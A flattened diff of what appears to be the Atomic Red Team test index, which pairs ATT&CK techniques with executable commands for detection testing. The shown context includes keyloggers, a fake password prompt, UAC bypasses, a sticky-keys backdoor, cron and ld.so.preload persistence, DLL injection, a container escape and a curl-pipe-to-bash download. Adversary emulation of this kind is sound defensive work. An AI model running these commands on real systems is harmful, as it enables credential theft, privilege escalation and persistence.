d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it -' + ' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt -' + ' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore -' + ' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} -' + ' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore -' + ' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script -' + ' supported_platforms: - linux - macos @@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} -' + ' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force -' + ' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore -' + ' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" -' + ' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} -' + ' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore -' + ' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) -' + ' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot -' + ' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud -' + ' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device -' + ' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi -' + ' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot -' + ' supported_platforms: - linux input_arguments: @@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed -' + ' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi -' + ' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat -' + ' executor: command: 'import -window root #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour -' + ' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore -' + ' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 -' + ' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore -' + ' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f -' + ' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f -' + ' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) -' + ' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" -' + ' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview @@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod -' + ' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. -' + ' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location -' + ' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} -' + ' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 